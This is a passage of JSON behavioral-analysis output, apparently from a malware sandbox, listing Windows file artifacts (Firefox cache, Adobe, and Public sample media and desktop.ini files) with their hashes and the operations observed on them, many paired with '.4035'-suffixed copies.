"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\4\\20\\cfa2fd01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\3\\DA\\2555Ed01.4035", "hashes": [ { "md5_hash": "60360426a9984ba7d88095a93ef9b6e5", "sha1_hash": "3cdd30b40fc1816e59011fe852bc4b85127255be", "sha256_hash": "85200bbe0dddab048b1dfd8f84a2a39bcb90ce9f20c2359162cc2de8bb53bbf7", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\3\\da\\2555ed01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\3\\DA\\2555Ed01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\3\\da\\2555ed01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\2\\BC\\A59C0d01.4035", "hashes": [ { "md5_hash": "ca5a6ac5822cd239a0b9fa2396223fec", "sha1_hash": "e5db29d8add7a8f43fc4a4c828c5fd11032c0947", "sha256_hash": "22df7449b763facdfaf1cc00127a1f5ce56987c1fde62f6e0bac334dc0b03656", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\2\\bc\\a59c0d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\2\\BC\\A59C0d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\2\\bc\\a59c0d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\2\\59\\DD6B0d01.4035", "hashes": [ { "md5_hash": "9cfaf264088c0167325d4ddb38b2eb3e", "sha1_hash": "ac02d54e9fdf3f1e72eee8d9c59146740884be85", "sha256_hash": "1cce8dce830d2732c6f0fec190d734b419efe1a74926587767f5649f53bfee0d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\2\\59\\dd6b0d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\2\\59\\DD6B0d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\2\\59\\dd6b0d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\F6\\CBD4Dd01.4035", "hashes": [ { "md5_hash": "c6d2d8c7a3fd124b3feeeb61b024e962", "sha1_hash": "0c0c05fabe6b3c8ce130935e4fcbb8e72a9eb930", "sha256_hash": "d0e1b044017020b314a2d6ea33fd6ba2ed571343b0a130b72999251679d2d7ae", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\f6\\cbd4dd01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\F6\\CBD4Dd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\f6\\cbd4dd01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\E4\\3C9ECd01.4035", "hashes": [ { "md5_hash": "67edf4842a7770c34fbe723599839873", "sha1_hash": "35b7b718409480178b6dd55a8cfc829f793a371a", "sha256_hash": "c5773c4b4b2417e1c330965e97c79993de9f42d37ab236efff225df22e9ad9ed", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\e4\\3c9ecd01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\E4\\3C9ECd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\e4\\3c9ecd01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\14\\BCC16d01.4035", "hashes": [ { "md5_hash": "61a511096fc26e2462ea7293eba9c952", "sha1_hash": "51d31f92db82c59d9d60236e710886ed0c1dceba", "sha256_hash": "fac6c976586f6697e2e7f1914085d474d43b0cd39a618f94062694ac8a2e03eb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\14\\bcc16d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\14\\BCC16d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\14\\bcc16d01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\0C\\642BBd01.4035", "hashes": [ { "md5_hash": "42be1a3a798bb3951167b369e70b53bd", "sha1_hash": "781dcd6bccfe14eb07049b8206eeb286a146feb9", "sha256_hash": "55a6e0ec32e89270bbd4dd2fd5d5e70d517d5494e7739eb6a8aa1e96cdf85437", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\0c\\642bbd01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\0C\\642BBd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\0c\\642bbd01", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\03\\3E20Ad01.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\03\\3e20ad01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\1\\03\\3E20Ad01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\1\\03\\3e20ad01", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\F4\\9ADE8d01.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\f4\\9ade8d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\F4\\9ADE8d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\f4\\9ade8d01", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\E1\\EBFA5d01.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\e1\\ebfa5d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\E1\\EBFA5d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\e1\\ebfa5d01", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\CB\\44E8Cd01.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\cb\\44e8cd01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\CB\\44E8Cd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\cb\\44e8cd01", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\A8\\C3B7Bd01.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\a8\\c3b7bd01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\A8\\C3B7Bd01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\a8\\c3b7bd01", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\98\\B60F3d01.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\98\\b60f3d01.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\0\\98\\B60F3d01", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\0\\98\\b60f3d01", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Color\\ACECache11.lst.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\color\\acecache11.lst.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Color\\ACECache11.lst", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\color\\acecache11.lst", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Color\\Profiles\\wscRGB.icc", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\color\\profiles\\wscrgb.icc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Color\\Profiles\\wsRGB.icc", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\color\\profiles\\wsrgb.icc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Videos\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\videos\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Videos\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\videos\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\videos\\sample videos\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\videos\\sample videos\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.4035", "hashes": [], "norm_filename": "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", "hashes": [], "norm_filename": "c:\\users\\public\\videos\\sample videos\\wildlife.wmv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Recorded TV\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\recorded tv\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Recorded TV\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\recorded tv\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\recorded tv\\sample media\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.4035", "hashes": [], "norm_filename": "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", "hashes": [], "norm_filename": "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\desert.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\koala.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\music\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\music\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\music\\sample music\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\Sample Music\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\music\\sample music\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\public\\music\\sample music\\kalimba.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", "hashes": [], "norm_filename": "c:\\users\\public\\music\\sample music\\kalimba.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", "hashes": [], "norm_filename": "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\public\\music\\sample music\\sleep away.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", "hashes": [], "norm_filename": "c:\\users\\public\\music\\sample music\\sleep away.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Libraries\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\public\\libraries\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Libraries\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\public\\libraries\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.4035", "hashes": [], "norm_filename": 